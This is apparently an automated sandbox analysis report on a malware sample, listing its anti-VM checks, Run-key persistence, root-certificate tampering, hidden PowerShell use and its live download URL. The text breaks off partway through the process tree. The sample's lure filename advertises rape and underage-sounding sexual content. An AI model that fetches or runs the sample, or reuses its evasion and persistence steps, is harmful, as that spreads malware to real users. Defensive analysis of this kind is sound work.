Analysis
-
max time kernel
283s -
max time network
283s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 00:31
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://files.catbox.moe/c95482.rar
Resource
win10v2004-20240426-en
General
-
Target
https://files.catbox.moe/c95482.rar
Malware Config
Signatures
-
Enumerates VirtualBox DLL files 2 TTPs 20 IoCs
Processes:
Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifInputSvc.exedescription ioc process File opened (read-only) \??\c:\windows\system32\vboxmrxnp.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglcrutil.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglpackspu.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxdisp.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglpackspu.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglfeedbackspu.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxoglpassthroughspu.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxogl.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglerrorspu.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglpassthroughspu.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxmrxnp.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxogl.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxoglerrorspu.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxhook.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxoglfeedbackspu.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxdisp.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxhook.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxoglarrayspu.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxoglcrutil.dll InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxoglarrayspu.dll Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif -
Looks for VirtualBox drivers on disk 2 TTPs 8 IoCs
Processes:
Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifInputSvc.exedescription ioc process File opened (read-only) \??\c:\windows\system32\drivers\VBoxGuest.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\drivers\VBoxSF.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\drivers\VBoxVideo.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\drivers\VBoxMouse.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\VBoxGuest.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\VBoxSF.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\VBoxVideo.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\VBoxMouse.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif -
Looks for VirtualBox executables on disk 2 TTPs 6 IoCs
Processes:
InputSvc.exePorn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifdescription ioc process File opened (read-only) \??\c:\windows\system32\vboxservice.exe InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxtray.exe InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxControl.exe InputSvc.exe File opened (read-only) \??\c:\windows\system32\vboxservice.exe Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxtray.exe Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\vboxControl.exe Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 5888 powershell.exe 6072 powershell.exe 6072 powershell.exe 5888 powershell.exe -
Downloads MZ/PE file
-
Looks for VMWare drivers on disk 2 TTPs 4 IoCs
Processes:
InputSvc.exePorn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifdescription ioc process File opened (read-only) \??\c:\windows\system32\drivers\vmmouse.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\vmhgfs.sys InputSvc.exe File opened (read-only) \??\c:\windows\system32\drivers\vmmouse.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif File opened (read-only) \??\c:\windows\system32\drivers\vmhgfs.sys Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif -
Executes dropped EXE 4 IoCs
Processes:
winrar-x64-701.exewinrar-x64-701.exePorn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifInputSvc.exepid process 2236 winrar-x64-701.exe 5560 winrar-x64-701.exe 1032 Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif 4504 InputSvc.exe -
Loads dropped DLL 1 IoCs
Processes:
taskmgr.exepid process 5756 taskmgr.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InputSvc = "C:\\Users\\Admin\\AppData\\Local\\WindowsInputSvc\\InputSvc.exe" Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 151 ip-api.com -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 152 Go-http-client/1.1 -
Modifies registry class 4 IoCs
Processes:
msedge.exeOpenWith.exemsedge.exetaskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{FA340891-EFAC-4159-89D2-98EE5D73DEFD} msedge.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings taskmgr.exe -
Processes:
InputSvc.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 InputSvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 InputSvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 InputSvc.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 422667.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 5492 vlc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exetaskmgr.exepid process 1644 msedge.exe 1644 msedge.exe 1692 msedge.exe 1692 msedge.exe 3484 identity_helper.exe 3484 identity_helper.exe 3812 msedge.exe 3812 msedge.exe 4896 msedge.exe 4896 msedge.exe 5676 msedge.exe 5676 msedge.exe 3716 msedge.exe 3716 msedge.exe 5592 msedge.exe 5592 msedge.exe 4028 msedge.exe 4028 msedge.exe 5780 msedge.exe 5780 msedge.exe 5780 msedge.exe 5780 msedge.exe 4944 msedge.exe 4944 msedge.exe 1804 msedge.exe 1804 msedge.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
vlc.exetaskmgr.exepid process 5492 vlc.exe 5756 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
Processes:
msedge.exepid process 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
taskmgr.exe7zG.exewmic.exepowershell.exepowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 5756 taskmgr.exe Token: SeSystemProfilePrivilege 5756 taskmgr.exe Token: SeCreateGlobalPrivilege 5756 taskmgr.exe Token: SeRestorePrivilege 4636 7zG.exe Token: 35 4636 7zG.exe Token: SeSecurityPrivilege 4636 7zG.exe Token: SeSecurityPrivilege 4636 7zG.exe Token: SeIncreaseQuotaPrivilege 5516 wmic.exe Token: SeSecurityPrivilege 5516 wmic.exe Token: SeTakeOwnershipPrivilege 5516 wmic.exe Token: SeLoadDriverPrivilege 5516 wmic.exe Token: SeSystemProfilePrivilege 5516 wmic.exe Token: SeSystemtimePrivilege 5516 wmic.exe Token: SeProfSingleProcessPrivilege 5516 wmic.exe Token: SeIncBasePriorityPrivilege 5516 wmic.exe Token: SeCreatePagefilePrivilege 5516 wmic.exe Token: SeBackupPrivilege 5516 wmic.exe Token: SeRestorePrivilege 5516 wmic.exe Token: SeShutdownPrivilege 5516 wmic.exe Token: SeDebugPrivilege 5516 wmic.exe Token: SeSystemEnvironmentPrivilege 5516 wmic.exe Token: SeRemoteShutdownPrivilege 5516 wmic.exe Token: SeUndockPrivilege 5516 wmic.exe Token: SeManageVolumePrivilege 5516 wmic.exe Token: 33 5516 wmic.exe Token: 34 5516 wmic.exe Token: 35 5516 wmic.exe Token: 36 5516 wmic.exe Token: SeIncreaseQuotaPrivilege 5516 wmic.exe Token: SeSecurityPrivilege 5516 wmic.exe Token: SeTakeOwnershipPrivilege 5516 wmic.exe Token: SeLoadDriverPrivilege 5516 wmic.exe Token: SeSystemProfilePrivilege 5516 wmic.exe Token: SeSystemtimePrivilege 5516 wmic.exe Token: SeProfSingleProcessPrivilege 5516 wmic.exe Token: SeIncBasePriorityPrivilege 5516 wmic.exe Token: SeCreatePagefilePrivilege 5516 wmic.exe Token: SeBackupPrivilege 5516 wmic.exe Token: SeRestorePrivilege 5516 wmic.exe Token: SeShutdownPrivilege 5516 wmic.exe Token: SeDebugPrivilege 5516 wmic.exe Token: SeSystemEnvironmentPrivilege 5516 wmic.exe Token: SeRemoteShutdownPrivilege 5516 wmic.exe Token: SeUndockPrivilege 5516 wmic.exe Token: SeManageVolumePrivilege 5516 wmic.exe Token: 33 5516 wmic.exe Token: 34 5516 wmic.exe Token: 35 5516 wmic.exe Token: 36 5516 wmic.exe Token: SeDebugPrivilege 5888 powershell.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeBackupPrivilege 2460 svchost.exe Token: SeRestorePrivilege 2460 svchost.exe Token: SeSecurityPrivilege 2460 svchost.exe Token: SeTakeOwnershipPrivilege 2460 svchost.exe Token: 35 2460 svchost.exe Token: 33 5756 taskmgr.exe Token: SeIncBasePriorityPrivilege 5756 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exevlc.exepid process 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exevlc.exetaskmgr.exepid process 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 1692 msedge.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5492 vlc.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe 5756 taskmgr.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
OpenWith.exevlc.exewinrar-x64-701.exewinrar-x64-701.exepid process 5384 OpenWith.exe 5384 OpenWith.exe 5384 OpenWith.exe 5384 OpenWith.exe 5384 OpenWith.exe 5384 OpenWith.exe 5384 OpenWith.exe 5492 vlc.exe 2236 winrar-x64-701.exe 2236 winrar-x64-701.exe 2236 winrar-x64-701.exe 5560 winrar-x64-701.exe 5560 winrar-x64-701.exe 5560 winrar-x64-701.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1692 wrote to memory of 1508 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1508 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 3224 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1644 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1644 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe PID 1692 wrote to memory of 1360 1692 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://files.catbox.moe/c95482.rar1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1692 -
